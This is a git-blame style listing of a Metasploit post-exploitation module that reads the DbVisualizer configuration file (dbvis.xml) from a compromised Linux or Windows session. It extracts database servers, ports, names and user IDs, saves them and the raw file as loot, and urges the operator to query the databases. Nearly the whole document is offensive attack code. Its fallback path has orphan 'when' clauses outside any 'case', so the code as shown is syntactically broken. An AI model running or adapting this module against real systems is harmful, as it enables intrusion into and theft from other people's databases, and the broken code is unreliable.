2014-07-14 18:08:48 +00:00
|
|
|
##
|
|
|
|
# This module requires Metasploit: http//metasploit.com/download
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
require 'msf/core/auxiliary/report'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Post
|
|
|
|
|
|
|
|
include Msf::Post::File
|
|
|
|
include Msf::Post::Unix
|
|
|
|
include Msf::Auxiliary::Report
|
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super( update_info( info,
|
2014-07-14 20:49:19 +00:00
|
|
|
'Name' => 'Multi Gather Dbvis Connections Settings',
|
2014-07-14 18:08:48 +00:00
|
|
|
'Description' => %q{
|
|
|
|
DbVisualizer stores the user database configuration in dbvis.xml.
|
2014-07-14 19:39:34 +00:00
|
|
|
This module retrieves the connections settings from this file.
|
2014-07-14 18:08:48 +00:00
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
2014-07-14 19:57:36 +00:00
|
|
|
'Author' => [ 'David Bloom' ], # Twitter: @philophobia78
|
2014-07-14 18:08:48 +00:00
|
|
|
'Platform' => %w{ linux win },
|
|
|
|
'SessionTypes' => [ 'meterpreter', 'shell']
|
|
|
|
))
|
|
|
|
end
|
|
|
|
|
|
|
|
def run
|
|
|
|
db_table = Rex::Ui::Text::Table.new(
|
2014-07-14 20:45:17 +00:00
|
|
|
'Header' => "Dbvis Databases",
|
2014-07-14 18:08:48 +00:00
|
|
|
'Indent' => 2,
|
|
|
|
'Columns' =>
|
|
|
|
[
|
|
|
|
"Alias",
|
|
|
|
"Type",
|
|
|
|
"Server",
|
|
|
|
"Port",
|
|
|
|
"Database",
|
|
|
|
"Namespace",
|
|
|
|
"Userid",
|
|
|
|
])
|
|
|
|
|
|
|
|
dbs = []
|
|
|
|
|
|
|
|
case session.platform
|
|
|
|
when /linux/
|
|
|
|
user = session.shell_command("whoami").chomp
|
|
|
|
print_status("Current user is #{user}")
|
|
|
|
if (user =~ /root/)
|
2014-07-14 19:39:34 +00:00
|
|
|
user_base = "/root/"
|
2014-07-14 18:08:48 +00:00
|
|
|
else
|
|
|
|
user_base="/home/#{user}/"
|
|
|
|
end
|
|
|
|
dbvis_file = "#{user_base}.dbvis/config70/dbvis.xml"
|
|
|
|
when /win/
|
|
|
|
if session.type =~ /meterpreter/
|
|
|
|
user_profile = session.sys.config.getenv('USERPROFILE')
|
|
|
|
else
|
|
|
|
user_profile = cmd_exec("echo %USERPROFILE%").strip
|
|
|
|
end
|
|
|
|
dbvis_file = user_profile + "\\.dbvis\\config70\\dbvis.xml"
|
|
|
|
end
|
|
|
|
|
2014-07-14 20:24:53 +00:00
|
|
|
unless file?(dbvis_file)
|
2014-07-15 10:14:38 +00:00
|
|
|
print_status("File not found: #{dbvis_file}")
|
|
|
|
print_status("This could be an older version of dbvis, trying old path")
|
|
|
|
when /linux/
|
|
|
|
dbvis_file = "#{user_base}.dbvis/config/dbvis.xml"
|
|
|
|
when /win/
|
|
|
|
dbvis_file = user_profile + "\\.dbvis\\config\\dbvis.xml"
|
|
|
|
end
|
|
|
|
unless file?(dbvis_file)
|
|
|
|
print_error("File not found: #{dbvis_file}")
|
|
|
|
return
|
|
|
|
end
|
2014-07-14 20:01:03 +00:00
|
|
|
end
|
2014-07-15 10:14:38 +00:00
|
|
|
|
2014-07-14 18:08:48 +00:00
|
|
|
db = {}
|
|
|
|
print_status("Reading: #{dbvis_file}")
|
2014-07-14 19:39:34 +00:00
|
|
|
dbfound = false
|
|
|
|
|
2014-07-14 20:27:40 +00:00
|
|
|
raw_xml = ""
|
|
|
|
begin
|
|
|
|
raw_xml = read_file(dbvis_file)
|
|
|
|
rescue EOFError
|
|
|
|
# If there's nothing in the file, we hit EOFError
|
|
|
|
print_error("Nothing read from file: #{dbvis_file}, file may be empty")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
2014-07-14 18:08:48 +00:00
|
|
|
# read config file
|
2014-07-14 20:27:40 +00:00
|
|
|
raw_xml.each_line do |line|
|
2014-07-14 19:39:34 +00:00
|
|
|
if line =~ /<Database id=/
|
|
|
|
dbfound = true
|
|
|
|
elsif line =~ /<\/Database>/
|
|
|
|
dbfound=false
|
|
|
|
if db[:Database].nil?
|
|
|
|
db[:Database] = "";
|
|
|
|
end
|
|
|
|
if db[:Namespace].nil?
|
|
|
|
db[:Namespace] = "";
|
|
|
|
end
|
|
|
|
# save
|
|
|
|
dbs << db if (db[:Alias] and db[:Type] and db[:Server] and db[:Port] )
|
|
|
|
db = {}
|
|
|
|
end
|
2014-07-14 18:08:48 +00:00
|
|
|
|
2014-07-14 19:53:27 +00:00
|
|
|
if dbfound == true
|
2014-07-14 19:39:34 +00:00
|
|
|
# get the alias
|
|
|
|
if (line =~ /<Alias>([\S+\s+]+)<\/Alias>/i)
|
|
|
|
db[:Alias] = $1
|
|
|
|
end
|
|
|
|
|
|
|
|
# get the type
|
|
|
|
if (line =~ /<Type>([\S+\s+]+)<\/Type>/i)
|
|
|
|
db[:Type] = $1
|
|
|
|
end
|
|
|
|
|
|
|
|
# get the user
|
|
|
|
if (line =~ /<Userid>([\S+\s+]+)<\/Userid>/i)
|
|
|
|
db[:Userid] = $1
|
|
|
|
end
|
|
|
|
|
|
|
|
# get the server
|
|
|
|
if (line =~ /<UrlVariable UrlVariableName="Server">([\S+\s+]+)<\/UrlVariable>/i)
|
|
|
|
db[:Server] = $1
|
|
|
|
end
|
|
|
|
|
|
|
|
# get the port
|
|
|
|
if (line =~ /<UrlVariable UrlVariableName="Port">([\S+]+)<\/UrlVariable>/i)
|
|
|
|
db[:Port] = $1
|
|
|
|
end
|
|
|
|
|
|
|
|
# get the database
|
|
|
|
if (line =~ /<UrlVariable UrlVariableName="Database">([\S+\s+]+)<\/UrlVariable>/i)
|
|
|
|
db[:Database] = $1
|
|
|
|
end
|
|
|
|
|
|
|
|
# get the Namespace
|
|
|
|
if (line =~ /<UrlVariable UrlVariableName="Namespace">([\S+\s+]+)<\/UrlVariable>/i)
|
|
|
|
db[:Namespace] = $1
|
|
|
|
end
|
2014-07-14 18:08:48 +00:00
|
|
|
end
|
|
|
|
end
|
2014-07-14 19:39:34 +00:00
|
|
|
|
2014-07-14 20:14:54 +00:00
|
|
|
# print out
|
|
|
|
dbs.each do |db|
|
|
|
|
if ::Rex::Socket.is_ipv4?(db[:Server].to_s)
|
|
|
|
print_good("Reporting #{db[:Server]} ")
|
|
|
|
report_host(:host => db[:Server]);
|
|
|
|
end
|
2014-07-14 18:08:48 +00:00
|
|
|
|
2014-07-14 20:14:54 +00:00
|
|
|
db_table << [ db[:Alias] , db[:Type] , db[:Server], db[:Port], db[:Database], db[:Namespace], db[:Userid]]
|
|
|
|
end
|
2014-07-14 18:08:48 +00:00
|
|
|
|
2014-07-14 20:14:54 +00:00
|
|
|
if db_table.rows.empty?
|
|
|
|
print_status("No database settings found")
|
|
|
|
else
|
|
|
|
print_line("\n")
|
|
|
|
print_line(db_table.to_s)
|
|
|
|
print_good("Try to query listed databases with dbviscmd.sh (or .bat) -connection <alias> -sql <statements> and have fun !")
|
|
|
|
print_good("")
|
|
|
|
# store found databases
|
|
|
|
p = store_loot(
|
2014-07-14 18:08:48 +00:00
|
|
|
"dbvis.databases",
|
|
|
|
"text/csv",
|
|
|
|
session,
|
|
|
|
db_table.to_csv,
|
|
|
|
"dbvis_databases.txt",
|
|
|
|
"dbvis databases")
|
2014-07-14 20:14:54 +00:00
|
|
|
print_good("Databases settings stored in: #{p.to_s}")
|
|
|
|
end
|
2014-07-14 18:08:48 +00:00
|
|
|
|
2014-07-14 20:14:54 +00:00
|
|
|
print_status("Downloading #{dbvis_file}")
|
|
|
|
p = store_loot("dbvis.xml", "text/xml", session, read_file(dbvis_file), "#{dbvis_file}", "dbvis config")
|
|
|
|
print_good "dbvis.xml saved to #{p.to_s}"
|
2014-07-14 20:17:54 +00:00
|
|
|
end
|
2014-07-14 18:08:48 +00:00
|
|
|
end
|